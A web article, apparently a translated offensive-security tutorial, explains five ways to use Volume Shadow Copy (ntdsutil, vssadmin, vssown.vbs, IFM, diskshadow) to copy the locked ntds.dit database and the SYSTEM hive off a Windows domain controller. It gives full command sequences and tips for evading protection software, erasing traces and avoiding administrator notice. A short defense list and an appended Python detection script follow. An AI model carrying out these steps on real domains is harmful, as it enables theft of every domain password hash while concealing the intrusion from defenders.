Five tips for using Volume Shadow Copy Service to attack domain controllers


In Microsoft Active Directory, all directory data is stored in ntds.dit, a binary database file.

On a domain controller it lives at %SystemRoot%\ntds\NTDS.DIT. ntds.dit contains, among other things, user names, password hashes, group membership, GPP, OU and other Active Directory information. Like the SAM file, it is locked by the running Windows system. This article introduces how to export ntds.dit from the system and how to read the information inside it. Normally we use VSS, the Volume Shadow Copy Service, for this. VSS is essentially a snapshot technology used mainly for backup and recovery, and it works even when the target file is currently locked.

01 ntdsutil tool extraction

ntdsutil.exe is a command line tool that provides management facilities for Active Directory. You can use Ntdsutil.exe to perform database maintenance for Active Directory, manage and control single master operations, create application directory partitions, and remove metadata left behind by a domain controller that was demoted without using the Active Directory Installation Wizard (DCPromo.exe). This tool is installed on domain controllers by default. We can run it on the domain controller itself, or operate the domain controller remotely from a machine in the domain. Remote operation is explained in detail in the following chapters.

Supported operating systems are: Server 2003, Server 2008, Server 2012.

First, we enter the following command in cmd on the domain controller to create a snapshot. The snapshot is a point-in-time copy of the whole Windows volume, and the files inside it are not subject to Windows file locks. You can see that a snapshot with the GUID b899b565-dcd4-423a-b663-7dfabbfb979e is created, as shown in Figure 6-1.

ntdsutil snapshot "activate instance ntds" create quit quit


Figure 6-1 Using ntdsutil.exe to create a snapshot

Next, we mount the snapshot we just created on the machine. The command format is ntdsutil snapshot "mount {GUID}" quit quit, where GUID is the GUID of the snapshot we just created.

Enter the following command in cmd to mount. You can see that the snapshot has been successfully mounted to the system. The snapshot is mounted in the C:\$SNAP_201808131112_VOLUMEC$\ directory, as shown in Figure 6-2.

ntdsutil snapshot "mount {b899b565-dcd4-423a-b663-7dfabbfb979e}" quit quit


Figure 6-2 Mount the created snapshot into the system

Then use the copy command built into Windows to copy the file out of the snapshot; enter the following command in cmd.

copy C:\$SNAP_201808131112_VOLUMEC$\windows\ntds\ntds.dit c:\temp\ntds.dit

This command copies C:\$SNAP_201808131112_VOLUMEC$\windows\ntds\ntds.dit out of the snapshot to c:\temp\ntds.dit on the local disk.

Next, we unmount the previously mounted snapshot, delete the snapshot, and erase traces. As shown in Figure 6-3, enter the command in cmd:

ntdsutil snapshot "unmount {b899b565-dcd4-423a-b663-7dfabbfb979e}" "delete {b899b565-dcd4-423a-b663-7dfabbfb979e}" quit quit


Figure 6-3 Unmount and delete the mounted snapshot

Here b899b565-dcd4-423a-b663-7dfabbfb979e is the GUID assigned when the snapshot was created; a different GUID is generated each time a snapshot is created. Listing all current snapshots afterwards shows that none exist, confirming that the deletion succeeded, as shown in Figure 6-4.


Figure 6-4 lists all snapshots in the current system

02 vssadmin tool extraction

vssadmin is the VSS management tool shipped with Windows Server 2008 and Windows 7. It can create or delete shadow copies and list shadow copy information (only shadow copies created by the system provider can be managed). It can also display all installed volume shadow copy writers and providers, and change the size of the shadow copy storage area (the so-called "diff area").

Supported operating systems: Server 2008, Server 2012

The operation process is similar to ntdsutil. Open cmd on the domain controller and enter the following command to create a shadow copy of the C drive, as shown in Figure 6-5.

vssadmin create shadow /for=c:


Figure 6-5 Creating a snapshot

Copy ntds.dit out of the shadow copy just created; as shown in Figure 6-6, enter the command in cmd:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit c:\ntds.dit


Figure 6-6 Copy ntds.dit in the snapshot

Check the C drive and see that ntds.dit has been successfully copied, as shown in Figure 6-7.


Figure 6-7 Check whether the copy is successful

The next thing to do is to delete the copy and clean up the traces, as shown in Figure 6-8.


Figure 6-8 Deleting snapshots

03 vssown.vbs script extraction

vssown.vbs is similar to vssadmin. It was written by Tim Tomes and can create and delete volume shadow copies as well as start and stop the Volume Shadow Copy service. The project is hosted on GitHub; download address:

https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

Execute the script from cmd. The following commands of the script are commonly used:

cscript vssown.vbs /start      (start the Volume Shadow Copy Service)
cscript vssown.vbs /create c   (create a shadow copy of the C drive)
cscript vssown.vbs /list       (list current shadow copies)
cscript vssown.vbs /delete     (delete a shadow copy)

First start the Volume Shadow Copy service, as shown in Figure 6-9, enter the command:

cscript vssown.vbs /start


Figure 6-9 Starting the Volume Shadow Copy Service

Create a shadow copy of the C drive, as shown in Figure 6-10. Enter the command:

cscript vssown.vbs /create c


Figure 6-10 Creating a snapshot

List the current shadow copies, as shown in Figure 6-11, enter the command:

cscript vssown.vbs /list

You can see that there is currently one shadow copy with the ID {E6ED51DF-7EC8-43F5-84D0-077899E7D4C9}, located at \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8.


Figure 6-11 View currently existing snapshots

Copy ntds.dit and the copy is successful. As shown in Figure 6-12, enter the command:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\NTDS\ntds.dit c:\ntds.dit


Figure 6-12 Copy ntds.dit to local disk

Delete the shadow copy and erase traces, as shown in Figure 6-13, by entering the command:

cscript vssown.vbs /delete {E6ED51DF-7EC8-43F5-84D0-077899E7D4C9}


Figure 6-13 Deleting the created snapshot

04 Create shadow copies using NTDSUTIL's IFM

You can follow the four steps of method (1), namely create, mount, copy and delete, to obtain a copy of ntds.dit. Alternatively, you can create an IFM (Install From Media) set to obtain the ntds.dit database file. When NTDSUTIL creates an IFM, VSS takes a snapshot, mounts it, and copies ntds.dit and the computer's SAM to the target folder. This method can also be executed remotely via PowerShell or WMI, which we will introduce one by one in the following chapters.

First, we open cmd in administrator mode on the domain controller, as shown in Figure 6-14, and enter the following command.

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q


Figure 6-14 Create a snapshot and copy ntds.dit to the local disk

This command copies ntds.dit into the Active Directory subfolder of c:\test, as shown in Figure 6-15.


Figure 6-15 View ntds.dit exported to the local disk

The SYSTEM and SECURITY registry hives are copied into the registry subfolder of c:\test, as shown in Figure 6-16.


Figure 6-16 View the SYSTEM exported to the local disk

After dragging ntds.dit back to the local machine, delete the entire test folder on the target machine and enter the command:

rmdir /s/q test

Tips: Use Powershell to export ntds.dit

The nishang toolkit mentioned earlier contains a PowerShell script named Copy-VSS.ps1. Extract this script on its own, open a PowerShell window on the domain controller, import Copy-VSS.ps1 and run it, as shown in Figure 6-17, by entering the commands:

import-module .\Copy-VSS.ps1   # import the script
Copy-vss                       # run the function


Figure 6-17 Export ntds.dit using Powershell

This script will copy SAM, SYSTEM, and ntds.dit to the same directory as Copy-VSS.ps1, and we can drag them back to the local for processing.

05 Export ntds.dit using diskshadow

Microsoft's official documentation describes it as follows: "DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart." Because DiskShadow is signed by Microsoft and included by default in Windows Server 2008, Windows Server 2012 and Windows Server 2016, diskshadow.exe can also be used to drive VSS and export ntds.dit. Its function is similar to vshadow, but diskshadow sits in c:\windows\system32\ whereas vshadow ships with the Windows SDK, so in a real engagement vshadow would first have to be transferred to the target machine. In other words, diskshadow is available out of the box on the target system during a penetration test. Diskshadow has an interactive mode and a non-interactive mode. The interactive mode requires a graphical session such as a remote desktop login, which is not covert, so we generally use the non-interactive mode. In either mode, EXEC can be used to run commands from a script file.

First, check the help information of diskshadow.exe, list all options, and enter the command, as shown in Figure 6-18.

diskshadow.exe /?


Figure 6-18 View the help information of diskshadow.exe

diskshadow.exe can be used to execute commands, and this bypasses some protection programs. As a check, we can have diskshadow.exe run calc.exe. Write the command to be executed into a text file: first write the line exec c:\windows\system32\calc.exe into command.txt in the root of the C drive, as shown in Figure 6-19.


Figure 6-19 View the content in the script file

Then use diskshadow.exe to execute the command and enter the command, as shown in Figure 6-20.


Figure 6-20 uses diskshadow.exe to run a calc.exe

diskshadow.exe can also be used to export ntds.dit. We need to write the commands into a text file with the following content:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% k:
exec "cmd.exe" /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit
delete shadows all
list shadows all
reset
exit

The lines in turn set the shadow copy context, add the C volume under an alias, create the snapshot, expose it under the drive letter k:, copy ntds.dit from it to the C drive, delete all snapshots, list the system's shadow copies, reset, and exit.

Use diskshadow.exe to directly load this text file to execute the command. Enter the command, as shown in Figure 6-21.

diskshadow /s c:\command.txt


Figure 6-21 Execute script to export ntds.dit

Note: When using diskshadow.exe to export ntds.dit, the current shell on the domain controller must first be switched to C:\windows\system32\, otherwise an error occurs; only then can diskshadow.exe load and execute command.txt.

The effect of creating a snapshot and assigning a drive letter is shown in Figure 6-22.


Figure 6-22 Creating a virtual disk with a drive letter assigned

Having exported ntds.dit, we are not done yet: we also need to dump the SYSTEM registry hive, because the key needed to decrypt ntds.dit (the boot key) is stored there, and without it the contents of ntds.dit cannot be read. Enter the command, as shown in Figure 6-23.

reg save hklm\system c:\windows\temp\system.hive


Figure 6-23 Export SYSTEM from the registry

Note: When using diskshadow.exe to export ntds.dit, remember to delete the snapshot and the assigned drive letter once the export has succeeded, so as not to alert the administrator and cause unnecessary trouble.

06 Summary

1. In a practical environment, some functions of diskshadow.exe can be used with unprivileged user rights. Compared with tools such as Vshadow, diskshadow.exe is more flexible.

2. To execute a command with diskshadow.exe, a text file has to be uploaded to the local disk of the target operating system, or the operation has to be completed interactively. Tools such as Vshadow, by contrast, can execute the relevant commands directly; on systems with stricter security restrictions this can greatly reduce the chance of being discovered.

3. In actual combat, first write the text file containing the commands that need to be executed to the remote target operating system, and then use diskshadow.exe to call the text file and execute it.

4. Use diskshadow.exe to export ntds.dit. You can use wmi to operate the remote host to avoid graphical login.

5. When using diskshadow.exe to export ntds.dit, be sure to perform the operation in C:\windows\system32\.

6. After the script execution is completed, check the size of ntds.dit copied from the snapshot. If an error occurs, you can check and modify the script and execute it again.

Defense:

1. Monitor the use of Volume Shadow Copy Service (VSS), detect volume shadow copy activities and any suspicious operations involving the Active Directory database file (ntds.dit).

2. Monitor suspicious instances of System Event ID 7036 (a sign that the Volume Shadow Copy Service has entered a running state) and the creation event of the VSSVC.exe process.

3. Monitor the process creation events of diskshadow.exe and related child processes.

4. Monitor the creation of diskshadow.exe instances on client devices. Unless it is a business requirement, diskshadow.exe should not appear in the Windows operating system and can be deleted from the computer.

5. Monitor the logs for new logical drive mapping events.
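The monitoring points above, as an added detection example that is not from the original post: a small Python rule set run over constructed records (a System-log 7036 event and Sysmon-style process-creation events; the sample data and field names are assumptions), flagging the VSS service entering the running state, VSSVC.exe and diskshadow.exe creation, child processes of diskshadow.exe, ntds.dit reads from a shadow-copy path, and the ntdsutil snapshot/IFM and vssadmin create-shadow invocations used in the article.

```python
import re

S = "C:\\Windows\\System32\\"
# Constructed sample records (not from the original post). id 7036 is a System-log
# service-state event; id 1 is a Sysmon-style process-creation record carrying the
# image, its parent image and the full command line.
SAMPLE_EVENTS = [
    {"id": 7036, "message": "The Volume Shadow Copy service entered the running state."},
    {"id": 1, "image": S + "VSSVC.exe", "parent": S + "services.exe", "cmd": "VSSVC.exe"},
    {"id": 1, "image": S + "diskshadow.exe", "parent": S + "cmd.exe", "cmd": r"diskshadow /s c:\command.txt"},
    {"id": 1, "image": S + "cmd.exe", "parent": S + "diskshadow.exe",
     "cmd": r"cmd.exe /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit"},
    {"id": 1, "image": S + "cmd.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmd": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\NTDS\ntds.dit c:\ntds.dit"},
    {"id": 1, "image": S + "ntdsutil.exe", "parent": S + "cmd.exe",
     "cmd": 'ntdsutil "ac i ntds" "ifm" "create full c:/test" q q'},
    {"id": 1, "image": S + "vssadmin.exe", "parent": S + "cmd.exe", "cmd": "vssadmin list shadows"},
    {"id": 1, "image": S + "notepad.exe", "parent": "C:\\Windows\\explorer.exe", "cmd": "notepad.exe readme.txt"},
]

def _is(event, field, name):
    # True when the path in `field` ends with "\<name>", case-insensitively.
    return event.get(field, "").lower().endswith("\\" + name)

# One rule per monitoring point in the Defense list above.
RULES = [
    ("vss_service_started", lambda e: e["id"] == 7036
        and "Volume Shadow Copy" in e["message"] and "running state" in e["message"]),
    ("vssvc_process_created", lambda e: e["id"] == 1 and _is(e, "image", "vssvc.exe")),
    ("diskshadow_started", lambda e: e["id"] == 1 and _is(e, "image", "diskshadow.exe")),
    ("diskshadow_child_process", lambda e: e["id"] == 1 and _is(e, "parent", "diskshadow.exe")),
    ("ntds_dit_read_from_shadow", lambda e: e["id"] == 1 and bool(re.search(
        r"(harddiskvolumeshadowcopy\d+|\\\$snap_).*ntds\.dit", e.get("cmd", ""), re.I))),
    ("ntdsutil_snapshot_or_ifm", lambda e: e["id"] == 1 and _is(e, "image", "ntdsutil.exe")
        and bool(re.search(r"\bifm\b|\bsnapshot\b", e["cmd"], re.I))),
    ("vssadmin_create_shadow", lambda e: e["id"] == 1 and _is(e, "image", "vssadmin.exe")
        and bool(re.search(r"create\s+shadow", e["cmd"], re.I))),
]

def evaluate(events):
    """Return (rule_name, command_or_message) for every rule that fires, in event order."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e.get("cmd", e.get("message", ""))))
    return hits

if __name__ == "__main__":
    for name, detail in evaluate(SAMPLE_EVENTS):
        print(f"{name:26} {detail}")
```

The ntdsutil snapshot mount path from method 01 (C:\$SNAP_...) is matched by the same rule as the HarddiskVolumeShadowCopy path, while the diskshadow-exposed drive letter is arbitrary and is instead caught through the parent-process rule.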


syntaxbug.com © 2021 All Rights Reserved.